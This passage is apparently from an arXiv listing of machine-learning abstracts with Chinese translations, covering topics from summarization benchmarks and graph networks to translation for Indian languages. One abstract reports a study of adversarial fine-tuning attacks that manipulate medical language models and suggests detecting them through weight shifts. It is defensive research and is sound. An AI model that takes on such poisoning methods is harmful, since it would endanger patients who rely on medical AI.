mitigated through fine-tuning. (4) Fine-tuned Chat or Instruction versions may harm the Base model and further fine-tuning cannot bridge performance gap. (5) while models with RoPE base scaling exhibit strong extrapolation potential, their performance may vary significantly when combined with other interpolation methods and need careful selection. (6) CNNSum provides more reliable and insightful evaluation results than other benchmarks. We release CNNSum to advance research in this field.
Updated: 2024-12-05 17:51:20
标题: CNNSum: 在中国小说中利用大型语言模型探索长文本摘要
摘要: 大型语言模型(LLMs)在许多长文本任务中已经得到了充分研究。然而,由于注释成本高昂,用于训练或评估的高质量长文本摘要数据集稀缺,限制了进一步的研究。在这项工作中,我们介绍了CNNSum,一个新的多尺度中文长文本小说摘要基准,包括四个子集,长度覆盖16k\textasciitilde128k,总共695个样本,注释是由人类驱动的。我们评估了商业和开源模型在CNNSum上的表现,并进行了详细分析。根据观察结果,我们进一步进行了对短文本摘要数据的微调探索。在我们的研究中:(1)由于过多主观评论,GPT-4o表现不佳。 (2)目前,长文本摘要主要依赖于记忆能力,稳定的较长上下文长度的小型LLMs是最具成本效益的。使用从短文本摘要串联而来的长数据可以显著改善性能。 (3)提示模板可能导致很大的性能差距,但可以通过微调来缓解。 (4)微调的Chat或Instruction版本可能会损害基础模型,进一步微调无法弥补性能差距。 (5)虽然具有RoPE基础缩放的模型表现出强大的外推潜力,但当与其他插值方法结合时,其性能可能会有显著差异,需要仔细选择。 (6)CNNSum提供比其他基准更可靠和更有见地的评估结果。我们发布CNNSum以推动该领域的研究。
更新时间: 2024-12-05 17:51:20
领域: cs.CL,cs.AI
Adversarial Attacks on Large Language Models in Medicine
The integration of Large Language Models (LLMs) into healthcare applications offers promising advancements in medical diagnostics, treatment recommendations, and patient care. However, the susceptibility of LLMs to adversarial attacks poses a significant threat, potentially leading to harmful outcomes in delicate medical contexts. This study investigates the vulnerability of LLMs to two types of adversarial attacks in three medical tasks. Utilizing real-world patient data, we demonstrate that both open-source and proprietary LLMs are susceptible to manipulation across multiple tasks. This research further reveals that domain-specific tasks demand more adversarial data in model fine-tuning than general domain tasks for effective attack execution, especially for more capable models. We discover that while integrating adversarial data does not markedly degrade overall model performance on medical benchmarks, it does lead to noticeable shifts in fine-tuned model weights, suggesting a potential pathway for detecting and countering model attacks. This research highlights the urgent need for robust security measures and the development of defensive mechanisms to safeguard LLMs in medical applications, to ensure their safe and effective deployment in healthcare settings.
Updated: 2024-12-05 17:47:30
标题: 在医学领域中对大型语言模型的对抗性攻击
摘要: 将大型语言模型(LLMs)集成到医疗应用程序中,可以为医疗诊断、治疗建议和患者护理带来有希望的进展。然而,LLMs对对抗性攻击的敏感性构成了重大威胁,可能导致在敏感的医疗环境中产生有害后果。本研究调查了LLMs在三个医疗任务中对两种类型的对抗性攻击的脆弱性。利用真实世界的患者数据,我们证明了开源和专有LLMs在多个任务中都容易受到操纵。这项研究进一步揭示了领域特定任务在模型微调中需要更多对抗性数据,以便有效地执行攻击,尤其是对于更强大的模型。我们发现,虽然集成对抗性数据并没有明显降低模型在医疗基准测试上的整体性能,但确实会导致微调模型权重的明显变化,这表明了一种检测和抵御模型攻击的潜在途径。这项研究强调了医疗应用中建立强大安全措施和开发防御机制的迫切需要,以确保LLMs在医疗环境中的安全有效部署。
更新时间: 2024-12-05 17:47:30
领域: cs.AI
Don't Be So Positive: Negative Step Sizes in Second-Order Methods
The value of second-order methods lies in the use of curvature information. Yet, this information is costly to extract and once obtained, valuable negative curvature information is often discarded so that the method is globally convergent. This limits the effectiveness of second-order methods in modern machine learning. In this paper, we show that second-order and second-order-like methods are promising optimizers for neural networks provided that we add one ingredient: negative step sizes. We show that under very general conditions, methods that produce ascent directions are globally convergent when combined with a Wolfe line search that allows both positive and negative step sizes. We experimentally demonstrate that using negative step sizes is often more effective than common Hessian modification methods.
Updated: 2024-12-05 17:44:09
标题: 不要过于乐观:二阶方法中的负步长
摘要: 二阶方法的价值在于利用曲率信息。然而,提取这些信息是昂贵的,而且一旦获取,有价值的负曲率信息经常被丢弃,以使方法全局收敛。这限制了二阶方法在现代机器学习中的有效性。在本文中,我们展示了二阶和类似二阶方法是神经网络的有前途的优化器,前提是我们添加一个成分:负步长。我们展示了在非常普遍的条件下,产生上升方向的方法与允许正负步长的Wolfe线搜索相结合时是全局收敛的。我们在实验中证明,使用负步长通常比常见的Hessian修改方法更有效。
更新时间: 2024-12-05 17:44:09
领域: cs.LG,math.OC,stat.ML
Finer Behavioral Foundation Models via Auto-Regressive Features and Advantage Weighting
The forward-backward representation (FB) is a recently proposed framework (Touati et al., 2023; Touati & Ollivier, 2021) to train behavior foundation models (BFMs) that aim at providing zero-shot efficient policies for any new task specified in a given reinforcement learning (RL) environment, without training for each new task. Here we address two core limitations of FB model training. First, FB, like all successor-feature-based methods, relies on a linear encoding of tasks: at test time, each new reward function is linearly projected onto a fixed set of pre-trained features. This limits expressivity as well as precision of the task representation. We break the linearity limitation by introducing auto-regressive features for FB, which let finegrained task features depend on coarser-grained task information. This can represent arbitrary nonlinear task encodings, thus significantly increasing expressivity of the FB framework. Second, it is well-known that training RL agents from offline datasets often requires specific techniques.We show that FB works well together with such offline RL techniques, by adapting techniques from (Nair et al.,2020b; Cetin et al., 2024) for FB. This is necessary to get non-flatlining performance in some datasets, such as DMC Humanoid. As a result, we produce efficient FB BFMs for a number of new environments. Notably, in the D4RL locomotion benchmark, the generic FB agent matches the performance of standard single-task offline agents (IQL, XQL). In many setups, the offline techniques are needed to get any decent performance at all. The auto-regressive features have a positive but moderate impact, concentrated on tasks requiring spatial precision and task generalization beyond the behaviors represented in the trainset.
Updated: 2024-12-05 17:36:22
标题: 通过自回归特征和优势加权实现更精细的行为基础模型
摘要: 前向-后向表示(FB)是最近提出的一个框架(Touati等,2023年;Touati&Ollivier,2021年),用于训练旨在为给定的强化学习(RL)环境中指定的任何新任务提供零-shot高效策略的行为基础模型(BFM),而无需为每个新任务进行训练。在这里,我们解决了FB模型训练的两个核心限制。首先,类似于所有基于后继特征的方法,FB依赖于任务的线性编码:在测试时,每个新的奖励函数都会被线性投影到一组固定的预训练特征上。这限制了任务表示的表达能力和精度。我们通过为FB引入自回归特征来打破线性限制,这使得细粒度任务特征可以依赖于粗粒度任务信息。这可以表示任意非线性任务编码,从而显着增加了FB框架的表达能力。其次,众所周知,从离线数据集训练RL代理通常需要特定的技术。我们展示了FB与这些离线RL技术结合使用效果良好,通过从(Nair等,2020b;Cetin等,2024年)中为FB调整技术。这对于在一些数据集中获得非平坦性能是必要的,例如DMC Humanoid。因此,我们为多个新环境生产了高效的FB BFM。值得注意的是,在D4RL运动基准测试中,通用的FB代理与标准单任务离线代理(IQL,XQL)的性能相匹配。在许多设置中,离线技术是必要的才能获得任何体面的性能。自回归特征对需要空间精度和任务泛化超出训练集中表示的行为的任务产生了积极但适度的影响。
更新时间: 2024-12-05 17:36:22
领域: cs.LG
Machine Theory of Mind for Autonomous Cyber-Defence
Intelligent autonomous agents hold much potential for the domain of cyber-security. However, due to many state-of-the-art approaches relying on uninterpretable black-box models, there is growing demand for methods that offer stakeholders clear and actionable insights into their latent beliefs and motivations. To address this, we evaluate Theory of Mind (ToM) approaches for Autonomous Cyber Operations. Upon learning a robust prior, ToM models can predict an agent's goals, behaviours, and contextual beliefs given only a handful of past behaviour observations. In this paper, we introduce a novel Graph Neural Network (GNN)-based ToM architecture tailored for cyber-defence, Graph-In, Graph-Out (GIGO)-ToM, which can accurately predict both the targets and attack trajectories of adversarial cyber agents over arbitrary computer network topologies. To evaluate the latter, we propose a novel extension of the Wasserstein distance for measuring the similarity of graph-based probability distributions. Whereas the standard Wasserstein distance lacks a fixed reference scale, we introduce a graph-theoretic normalization factor that enables a standardized comparison between networks of different sizes. We furnish this metric, which we term the Network Transport Distance (NTD), with a weighting function that emphasizes predictions according to custom node features, allowing network operators to explore arbitrary strategic considerations. Benchmarked against a Graph-In, Dense-Out (GIDO)-ToM architecture in an abstract cyber-defence environment, our empirical evaluations show that GIGO-ToM can accurately predict the goals and behaviours of various unseen cyber-attacking agents across a range of network topologies, as well as learn embeddings that can effectively characterize their policies.
Updated: 2024-12-05 17:35:29
标题: 自主网络防御的机器心理理论
摘要: 智能自主代理在网络安全领域具有很大潜力。然而,由于许多最先进的方法依赖于不可解释的黑匣子模型,对于提供利益相关者清晰和可操作见解的方法需求日益增长。为了解决这个问题,我们评估了自主网络操作的理论心智(ToM)方法。通过学习强大的先验知识,ToM模型可以仅通过少数过去的行为观察来预测代理的目标、行为和背景信念。在本文中,我们介绍了一种专为网络防御定制的图神经网络(GNN)-ToM架构,称为图输入图输出(GIGO)-ToM,它可以准确预测对手网络攻击代理的目标和攻击轨迹,涵盖任意计算机网络拓扑。为了评估后者,我们提出了一种用于衡量基于图的概率分布相似性的Wasserstein距离的新扩展。标准Wasserstein距离缺乏固定的参考尺度,我们引入了一个图论归一化因子,使不同大小的网络之间能够进行标准化比较。我们为这个指标(称为网络传输距离NTD)提供了一个加权函数,根据自定义节点特征强调预测,使网络运营商能够探索任意战略考虑。在一个抽象的网络防御环境中,与图输入密集输出(GIDO)-ToM架构进行基准测试,我们的实证评估表明,GIGO-ToM可以准确预测各种看不见的网络攻击代理在各种网络拓扑中的目标和行为,以及学习有效表征其策略的嵌入。
更新时间: 2024-12-05 17:35:29
领域: cs.LG,cs.AI,cs.MA
Artificial intelligence and the internal processes of creativity
Artificial intelligence (AI) systems capable of generating creative outputs are reshaping our understanding of creativity. This shift presents an opportunity for creativity researchers to reevaluate the key components of the creative process. In particular, the advanced capabilities of AI underscore the importance of studying the internal processes of creativity. This paper explores the neurobiological machinery that underlies these internal processes and describes the experiential component of creativity. It is concluded that although the products of artificial and human creativity can be similar, the internal processes are different. The paper also discusses how AI may negatively affect the internal processes of human creativity, such as the development of skills, the integration of knowledge, and the diversity of ideas.
Updated: 2024-12-05 17:33:12
标题: 人工智能与创造力的内在过程
摘要: 人工智能(AI)系统能够生成创意产出,正在重塑我们对创造力的理解。这种转变为创造力研究者重新评估创造过程的关键组成部分提供了机会。特别是,AI的先进能力强调了研究创造力内部过程的重要性。本文探讨了支撑这些内部过程的神经生物机制,并描述了创造力的体验性组成部分。结论是,虽然人工和人类创造力的产品可能相似,但内部过程是不同的。本文还讨论了AI如何可能对人类创造力的内部过程产生负面影响,比如技能的发展、知识的整合和思想的多样性。
更新时间: 2024-12-05 17:33:12
领域: cs.CY,cs.AI,q-bio.NC
GeoPos: A Minimal Positional Encoding for Enhanced Fine-Grained Details in Image Synthesis Using Convolutional Neural Networks
The enduring inability of image generative models to recreate intricate geometric features, such as those present in human hands and fingers has been an ongoing problem in image generation for nearly a decade. While strides have been made by increasing model sizes and diversifying training datasets, this issue remains prevalent across all models, from denoising diffusion models to Generative Adversarial Networks (GAN), pointing to a fundamental shortcoming in the underlying architectures. In this paper, we demonstrate how this problem can be mitigated by augmenting convolution layers geometric capabilities through providing them with a single input channel incorporating the relative n-dimensional Cartesian coordinate system. We show this drastically improves quality of images generated by Diffusion Models, GANs, and Variational AutoEncoders (VAE).
Updated: 2024-12-05 17:31:43
标题: GeoPos:一种用于使用卷积神经网络增强图像合成中细节的最小位置编码
摘要: 长期以来,图像生成模型无法重现复杂的几何特征,比如人类手和手指中的那些特征,这在图像生成领域已经成为一个持续存在的问题将近十年。尽管通过增加模型大小和多样化训练数据集已经取得了一些进展,但这个问题仍然存在于所有模型中,从去噪扩散模型到生成对抗网络(GAN),指向了底层架构中的一个基本缺陷。在本文中,我们展示了如何通过为卷积层增加几何能力,通过向其提供一个单一输入通道,其中包含相对n维笛卡尔坐标系,来缓解这个问题。我们展示了这种方法显著改善了扩散模型、GAN和变分自编码器(VAE)生成的图像质量。
更新时间: 2024-12-05 17:31:43
领域: cs.CV,cs.AI,cs.LG,51,I.2.10; I.4.0; I.4.10
Is uniform expressivity too restrictive? Towards efficient expressivity of graph neural networks
Uniform expressivity guarantees that a Graph Neural Network (GNN) can express a query without the parameters depending on the size of the input graphs. This property is desirable in applications in order to have number of trainable parameters that is independent of the size of the input graphs. Uniform expressivity of the two variable guarded fragment (GC2) of first order logic is a well-celebrated result for Rectified Linear Unit (ReLU) GNNs [Barcelo & al., 2020]. In this article, we prove that uniform expressivity of GC2 queries is not possible for GNNs with a wide class of Pfaffian activation functions (including the sigmoid and tanh), answering a question formulated by [Grohe, 2021]. We also show that despite these limitations, many of those GNNs can still efficiently express GC2 queries in a way that the number of parameters remains logarithmic on the maximal degree of the input graphs. Furthermore, we demonstrate that a log-log dependency on the degree is achievable for a certain choice of activation function. This shows that uniform expressivity can be successfully relaxed by covering large graphs appearing in practical applications. Our experiments illustrates that our theoretical estimates hold in practice.
Updated: 2024-12-05 17:22:21
标题: 统一表达性过于严格吗?朝着图神经网络高效表达性的方向
摘要: 统一的表达性保证了图神经网络(GNN)可以表达一个查询,而不依赖于输入图的大小。这种特性在应用中是可取的,因为这样可以获得与输入图大小无关的可训练参数数量。一阶逻辑的两变量受限片段(GC2)的统一表达性是对修正线性单元(ReLU)GNNs 的一个广受赞誉的结果 [Barcelo 等,2020]。在本文中,我们证明了对于具有广泛类别的 Pfaffian 激活函数(包括 sigmoid 和 tanh)的 GNNs,GC2 查询的统一表达性是不可能的,这回答了由 [Grohe, 2021] 提出的一个问题。我们还展示了尽管存在这些限制,许多这些 GNNs 仍然可以有效地表达 GC2 查询,而参数数量仍然对输入图的最大度数取对数。此外,我们展示了对于某种激活函数的选择,可以实现对度数的对数对数依赖性。这表明统一的表达性可以通过覆盖出现在实际应用中的大图来成功放宽。我们的实验表明我们的理论估计在实践中成立。
更新时间: 2024-12-05 17:22:21
领域: cs.LG,cs.CC,cs.LO
Introducing the Large Medical Model: State of the art healthcare cost and risk prediction with transformers trained on patient event sequences
With U.S. healthcare spending approaching $5T (NHE Fact Sheet 2024), and 25% of it estimated to be wasteful (Waste in the US the health care system: estimated costs and potential for savings, n.d.), the need to better predict risk and optimal patient care is evermore important. This paper introduces the Large Medical Model (LMM), a generative pre-trained transformer (GPT) designed to guide and predict the broad facets of patient care and healthcare administration. The model is trained on medical event sequences from over 140M longitudinal patient claims records with a specialized vocabulary built from medical terminology systems and demonstrates a superior capability to forecast healthcare costs and identify potential risk factors. Through experimentation and validation, we showcase the LMM's proficiency in not only in cost and risk predictions, but also in discerning intricate patterns within complex medical conditions and an ability to identify novel relationships in patient care. The LMM is able to improve both cost prediction by 14.1% over the best commercial models and chronic conditions prediction by 1.9% over the best transformer models in research predicting a broad set of conditions. The LMM is a substantial advancement in healthcare analytics, offering the potential to significantly enhance risk assessment, cost management, and personalized medicine.
Updated: 2024-12-05 17:19:12
标题: 引入大型医疗模型:基于患者事件序列训练的变压器进行的最先进的医疗成本和风险预测
摘要: 随着美国医疗支出接近5万亿美元(NHE Fact Sheet 2024),其中25%被估计为浪费(Waste in the US the health care system: estimated costs and potential for savings, n.d.),更准确地预测风险和最佳患者护理的需求变得更加重要。本文介绍了大型医疗模型(LMM),这是一种生成式预训练变换器(GPT),旨在指导和预测患者护理和医疗管理的广泛方面。该模型基于超过1.4亿纵向患者索赔记录中的医疗事件序列进行训练,使用从医学术语系统构建的专门词汇表,并展示了优越的能力来预测医疗成本并识别潜在风险因素。通过实验和验证,我们展示了LMM在成本和风险预测方面的熟练程度,以及在辨别复杂医疗状况中的复杂模式和识别患者护理中的新关系方面的能力。LMM能够比最佳商业模型提高成本预测14.1%,比研究中最佳变换器模型提高1.9%的慢性状况预测。LMM是医疗分析的重大进步,有望显著增强风险评估、成本管理和个性化医学。
更新时间: 2024-12-05 17:19:12
领域: cs.LG,cs.AI,stat.AP,stat.ML,I.2.1; K.4.1; K.4.3; J.1; J.3
Approximate Top-$k$ for Increased Parallelism
We present an evaluation of bucketed approximate top-$k$ algorithms. Computing top-$k$ exactly suffers from limited parallelism, because the $k$ largest values must be aggregated along the vector, thus is not well suited to computation on highly-parallel machine learning accelerators. By relaxing the requirement that the top-$k$ is exact, bucketed algorithms can dramatically increase the parallelism available by independently computing many smaller top-$k$ operations. We explore the design choices of this class of algorithms using both theoretical analysis and empirical evaluation on downstream tasks. Our motivating examples are sparsity algorithms for language models, which often use top-$k$ to select the most important parameters or activations. We also release a fast bucketed top-$k$ implementation for PyTorch.
Updated: 2024-12-05 17:17:28
标题: 大致翻译为:增强并行性的近似前$k$
摘要: 我们提出了对分桶近似top-k算法的评估。精确计算top-k受限于有限的并行性,因为$k$个最大值必须沿着向量聚合,因此不适合在高度并行的机器学习加速器上进行计算。通过放宽top-k必须是精确的要求,分桶算法可以通过独立计算许多较小的top-k操作,显著增加可用的并行性。我们通过理论分析和对下游任务的经验评估,探讨了这类算法的设计选择。我们的动机示例是语言模型的稀疏算法,通常使用top-k来选择最重要的参数或激活。我们还发布了一个快速的PyTorch分桶top-k实现。
更新时间: 2024-12-05 17:17:28
领域: cs.LG
Multi-Scale Node Embeddings for Graph Modeling and Generation
Lying at the interface between Network Science and Machine Learning, node embedding algorithms take a graph as input and encode its structure onto output vectors that represent nodes in an abstract geometric space, enabling various vector-based downstream tasks such as network modelling, data compression, link prediction, and community detection. Two apparently unrelated limitations affect these algorithms. On one hand, it is not clear what the basic operation defining vector spaces, i.e. the vector sum, corresponds to in terms of the original nodes in the network. On the other hand, while the same input network can be represented at multiple levels of resolution by coarse-graining the constituent nodes into arbitrary block-nodes, the relationship between node embeddings obtained at different hierarchical levels is not understood. Here, building on recent results in network renormalization theory, we address these two limitations at once and define a multiscale node embedding method that, upon arbitrary coarse-grainings, ensures statistical consistency of the embedding vector of a block-node with the sum of the embedding vectors of its constituent nodes. We illustrate the power of this approach on two economic networks that can be naturally represented at multiple resolution levels: namely, the international trade between (sets of) countries and the input-output flows among (sets of) industries in the Netherlands. We confirm the statistical consistency between networks retrieved from coarse-grained node vectors and networks retrieved from sums of fine-grained node vectors, a result that cannot be achieved by alternative methods. Several key network properties, including a large number of triangles, are successfully replicated already from embeddings of very low dimensionality, allowing for the generation of faithful replicas of the original networks at arbitrary resolution levels.
Updated: 2024-12-05 17:12:45
标题: 多尺度节点嵌入用于图建模和生成
摘要: 这个文献摘要介绍了介于网络科学和机器学习之间的节点嵌入算法。这些算法将图形作为输入,并将其结构编码到表示抽象几何空间中的节点的输出向量中,从而实现各种基于向量的下游任务,如网络建模、数据压缩、链接预测和社区检测。然而,这些算法存在两个明显不相关的限制。一方面,不清楚定义向量空间的基本操作——即向量求和,与网络中原始节点的对应关系是什么。另一方面,虽然相同的输入网络可以通过将组成节点粗粒化为任意块节点的方式表示在多个分辨率级别上,但不清楚在不同分层级别获得的节点嵌入之间的关系。在最近网络重整化理论的基础上,我们一次性解决了这两个限制,并定义了一种多尺度节点嵌入方法,确保在任意粗粒化时,块节点的嵌入向量与其构成节点的嵌入向量之和保持统计一致。我们在两个经济网络上展示了这种方法的威力,这些网络可以自然地以多个分辨率级别表示:即,国家之间的国际贸易和荷兰工业之间的投入产出流动。我们确认了从粗粒化节点向量检索的网络和从细粒化节点向量之和检索的网络之间的统计一致性,这是其他方法无法实现的结果。一些关键的网络属性,包括大量的三角形,已经成功地从非常低维度的嵌入中复制,从而可以生成原始网络的忠实副本在任意分辨率级别。
更新时间: 2024-12-05 17:12:45
领域: physics.soc-ph,cs.LG,econ.GN,physics.data-an,q-fin.EC
ActFusion: a Unified Diffusion Model for Action Segmentation and Anticipation
Temporal action segmentation and long-term action anticipation are two popular vision tasks for the temporal analysis of actions in videos. Despite apparent relevance and potential complementarity, these two problems have been investigated as separate and distinct tasks. In this work, we tackle these two problems, action segmentation and action anticipation, jointly using a unified diffusion model dubbed ActFusion. The key idea to unification is to train the model to effectively handle both visible and invisible parts of the sequence in an integrated manner; the visible part is for temporal segmentation, and the invisible part is for future anticipation. To this end, we introduce a new anticipative masking strategy during training in which a late part of the video frames is masked as invisible, and learnable tokens replace these frames to learn to predict the invisible future. Experimental results demonstrate the bi-directional benefits between action segmentation and anticipation. ActFusion achieves the state-of-the-art performance across the standard benchmarks of 50 Salads, Breakfast, and GTEA, outperforming task-specific models in both of the two tasks with a single unified model through joint learning.
Updated: 2024-12-05 17:12:35
标题: ActFusion:一种统一的行为分割和预测扩散模型
摘要: 时间动作分割和长期动作预测是视频中动作的时间分析的两个流行视觉任务。尽管这两个问题具有明显的相关性和潜在的互补性,但这两个问题被独立地研究为不同的任务。在这项工作中,我们使用统一的扩散模型ActFusion共同解决这两个问题,即动作分割和动作预测。统一的关键思想是训练模型以有效地整合处理序列的可见和不可见部分;可见部分用于时间分割,不可见部分用于未来预测。为此,我们在训练过程中引入了一种新的预测掩蔽策略,其中视频帧的后部被掩盖为不可见,可学习的标记替换这些帧以学习预测不可见的未来。实验结果表明动作分割和预测之间的双向益处。ActFusion在50 Salads、Breakfast和GTEA的标准基准测试中实现了最先进的性能,在两个任务中均通过联合学习使用单一统一模型优于特定任务的模型。
更新时间: 2024-12-05 17:12:35
领域: cs.CV,cs.LG
BhashaVerse : Translation Ecosystem for Indian Subcontinent Languages
This paper focuses on developing translation models and related applications for 36 Indian languages, including Assamese, Awadhi, Bengali, Bhojpuri, Braj, Bodo, Dogri, English, Konkani, Gondi, Gujarati, Hindi, Hinglish, Ho, Kannada, Kangri, Kashmiri (Arabic and Devanagari), Khasi, Mizo, Magahi, Maithili, Malayalam, Marathi, Manipuri (Bengali and Meitei), Nepali, Oriya, Punjabi, Sanskrit, Santali, Sinhala, Sindhi (Arabic and Devanagari), Tamil, Tulu, Telugu, and Urdu. Achieving this requires parallel and other types of corpora for all 36 * 36 language pairs, addressing challenges like script variations, phonetic differences, and syntactic diversity. For instance, languages like Kashmiri and Sindhi, which use multiple scripts, demand script normalization for alignment, while low-resource languages such as Khasi and Santali require synthetic data augmentation to ensure sufficient coverage and quality. To address these challenges, this work proposes strategies for corpus creation by leveraging existing resources, developing parallel datasets, generating domain-specific corpora, and utilizing synthetic data techniques. Additionally, it evaluates machine translation across various dimensions, including standard and discourse-level translation, domain-specific translation, reference-based and reference-free evaluation, error analysis, and automatic post-editing. By integrating these elements, the study establishes a comprehensive framework to improve machine translation quality and enable better cross-lingual communication in India's linguistically diverse ecosystem.
Updated: 2024-12-05 17:10:19
标题: BhashaVerse: 印度次大陆语言翻译生态系统
摘要: 这篇论文侧重于开发翻译模型和相关应用程序,涉及包括阿萨姆语、阿瓦迪语、孟加拉语、博杰普尔语、布拉吉语、波多语、杜格里语、英语、孔卡尼语、贡迪语、古吉拉特语、印地语、印地英语混合语、胡语、卡纳达语、康格里语、克什米尔语(阿拉伯字母和天城字母)、卡西语、米佐语、马加希语、迈蒂利语、马来亚拉姆语、马拉地语、马尼普尔语(孟加拉字母和迈泰语)、尼泊尔语、奥里亚语、旁遮普语、梵语、桑塔利语、僧伽罗语、信德语(阿拉伯字母和天城字母)、泰米尔语、图鲁语、泰卢古语、泰卢古语和乌尔都语在内的36种印度语言。实现这一目标需要为所有36 * 36种语言对准备平行和其他类型的语料库,解决脚本变体、语音差异和句法多样性等挑战。例如,使用多种脚本的克什米尔语和信德语需要进行脚本规范化以进行对齐,而低资源语言如卡西语和桑塔利语需要使用合成数据增强来确保足够的覆盖范围和质量。 为了解决这些挑战,本研究提出了通过利用现有资源、开发平行数据集、生成领域特定语料库以及利用合成数据技术来创建语料库的策略。此外,还评估了各种维度上的机器翻译,包括标准和语篇级翻译、领域特定翻译、基于参考和无参考评估、错误分析和自动后编辑。通过整合这些元素,研究建立了一个全面的框架,以提高机器翻译质量,并促进印度语言多样性生态系统中更好的跨语言交流。
更新时间: 2024-12-05 17:10:19
领域: cs.CL,cs.AI
Iris: Dynamic Privacy Preserving Search in Authenticated Chord Peer-to-Peer Networks
In structured peer-to-peer networks, like Chord, users find data by asking a number of intermediate nodes in the network. Each node provides the identity of the closet known node to the address of the data, until eventually the node responsible for the data is reached. This structure means that the intermediate nodes learn the address of the sought after data. Revealing this information to other nodes makes Chord unsuitable for applications that require query privacy so in this paper we present a scheme Iris to provide query privacy while maintaining compatibility with the existing Chord protocol. This means that anyone using it will be able to execute a privacy preserving query but it does not require other nodes in the network to use it (or even know about it). In order to better capture the privacy achieved by the iterative nature of the search we propose a new privacy notion, inspired by $k$-anonymity. This new notion called $(\alpha,\delta)$-privacy, allows us to formulate privacy guarantees against adversaries that collude and take advantage of the total amount of information leaked in all iterations of the search. We present a security analysis of the proposed algorithm based on the privacy notion we introduce. We also develop a prototype of the algorithm in Matlab and evaluate its performance. Our analysis proves Iris to be $(\alpha,\delta)$-private while introducing a modest performance overhead. Importantly the overhead is tunable and proportional to the required level of privacy, so no privacy means no overhead.
Updated: 2024-12-05 17:09:25
标题: 鸢尾花:在认证的Chord对等网络中实现动态隐私保护搜索
摘要: 在结构化的对等网络中,如Chord,用户通过向网络中的若干中间节点询问来查找数据。每个节点提供到数据地址的最近已知节点的身份,直到最终到达负责数据的节点。这种结构意味着中间节点会学习所寻找数据的地址。将这些信息透露给其他节点使得Chord不适用于需要查询隐私的应用程序,因此在本文中我们提出了一种名为Iris的方案,以提供查询隐私同时保持与现有Chord协议的兼容性。这意味着任何使用它的人都将能够执行保护隐私的查询,但并不要求网络中的其他节点使用它(甚至知道它)。 为了更好地捕捉搜索过程中迭代性质带来的隐私性,我们提出了一种受$k$-匿名启发的新的隐私概念。这种新概念称为$(\alpha,\delta)$-隐私,使我们能够对抗共谋的对手并利用搜索过程中所有迭代中泄露的总信息量来制定隐私保证。 我们根据引入的隐私概念对所提出的算法进行了安全性分析。我们还在Matlab中开发了算法的原型并评估了其性能。我们的分析证明了Iris是$(\alpha,\delta)$-私密的,同时引入了适度的性能开销。重要的是,这种开销是可调的,并且与所需的隐私水平成比例,因此没有隐私意味着没有开销。
更新时间: 2024-12-05 17:09:25
领域: cs.CR
VMGuard: Reputation-Based Incentive Mechanism for Poisoning Attack Detection in Vehicular Metaverse
The vehicular Metaverse represents an emerging paradigm that merges vehicular communications with virtual environments, integrating real-world data to enhance in-vehicle services. However, this integration faces critical security challenges, particularly in the data collection layer where malicious sensing IoT (SIoT) devices can compromise service quality through data poisoning attacks. The security aspects of the Metaverse services should be well addressed both when creating the digital twins of the physical systems and when delivering the virtual service to the vehicular Metaverse users (VMUs). This paper introduces vehicular Metaverse guard (VMGuard), a novel four-layer security framework that protects vehicular Metaverse systems from data poisoning attacks. Specifically, when the virtual service providers (VSPs) collect data about physical environment through SIoT devices in the field, the delivered content might be tampered. Malicious SIoT devices with moral hazard might have private incentives to provide poisoned data to the VSP to degrade the service quality (QoS) and user experience (QoE) of the VMUs. The proposed framework implements a reputation-based incentive mechanism that leverages user feedback and subjective logic modeling to assess the trustworthiness of participating SIoT devices. More precisely, the framework entails the use of reputation scores assigned to participating SIoT devices based on their historical engagements with the VSPs. Ultimately, we validate our proposed model using comprehensive simulations. Our key findings indicate that our mechanism effectively prevents the initiation of poisoning attacks by malicious SIoT devices. Additionally, our system ensures that reliable SIoT devices, previously missclassified, are not barred from participating in future rounds of the market.
Updated: 2024-12-05 17:08:20
标题: VMGuard:基于声誉的激励机制在车联网元宇宙中检测中毒攻击
摘要: 车载Metaverse代表了一个新兴的范式,将车载通信与虚拟环境相结合,整合现实世界数据以增强车内服务。然而,这种整合面临着关键的安全挑战,特别是在数据收集层,恶意感知物联网(SIoT)设备可能通过数据毒化攻击来破坏服务质量。Metaverse服务的安全方面应该在创建物理系统的数字孪生体和向车载Metaverse用户(VMU)提供虚拟服务时得到很好的解决。本文介绍了车载Metaverse卫士(VMGuard),这是一个新颖的四层安全框架,用于保护车载Metaverse系统免受数据毒化攻击。具体来说,当虚拟服务提供商(VSP)通过现场的SIoT设备收集有关物理环境的数据时,传递的内容可能被篡改。具有道德风险的恶意SIoT设备可能有私人动机向VSP提供毒化数据,以降低VMU的服务质量(QoS)和用户体验(QoE)。所提出的框架实施了一种基于声誉的激励机制,利用用户反馈和主观逻辑建模来评估参与SIoT设备的信任度。更具体地说,该框架涉及根据参与SIoT设备与VSP的历史互动情况分配的声誉分数。最终,我们使用全面的模拟验证了我们提出的模型。我们的主要发现表明,我们的机制有效地阻止了恶意SIoT设备发起毒化攻击。此外,我们的系统确保了之前被错误分类的可靠SIoT设备不会被排除在未来市场交易的范围之外。
更新时间: 2024-12-05 17:08:20
领域: cs.CR
Distributionally Robust Performative Prediction
Performative prediction aims to model scenarios where predictive outcomes subsequently influence the very systems they target. The pursuit of a performative optimum (PO) -- minimizing performative risk -- is generally reliant on modeling of the distribution map, which characterizes how a deployed ML model alters the data distribution. Unfortunately, inevitable misspecification of the distribution map can lead to a poor approximation of the true PO. To address this issue, we introduce a novel framework of distributionally robust performative prediction and study a new solution concept termed as distributionally robust performative optimum (DRPO). We show provable guarantees for DRPO as a robust approximation to the true PO when the nominal distribution map is different from the actual one. Moreover, distributionally robust performative prediction can be reformulated as an augmented performative prediction problem, enabling efficient optimization. The experimental results demonstrate that DRPO offers potential advantages over traditional PO approach when the distribution map is misspecified at either micro- or macro-level.
Updated: 2024-12-05 17:05:49
标题: 分布稳健的表现性预测
摘要: Performative prediction旨在建模预测结果随后影响其目标系统的情景。追求执行最优(PO)-最小化执行风险-通常依赖于分布映射的建模,该分布映射表征了部署的ML模型如何改变数据分布。不幸的是,分布映射的不可避免的错误规定可能导致对真实PO的近似不佳。为了解决这个问题,我们提出了一个新的分布鲁棒的执行预测框架,并研究了一个称为分布鲁棒执行最优(DRPO)的新解决方案概念。我们展示了DRPO作为对真实PO的健壮近似的可证明保证,当名义分布映射与实际分布映射不同时。此外,分布鲁棒执行预测可以重新表述为增强执行预测问题,从而实现高效优化。实验结果表明,当分布映射在微观或宏观水平上被错误规定时,DRPO相对于传统PO方法提供潜在优势。
更新时间: 2024-12-05 17:05:49
领域: cs.LG,stat.ML
Limit Theorems for Stochastic Gradient Descent with Infinite Variance
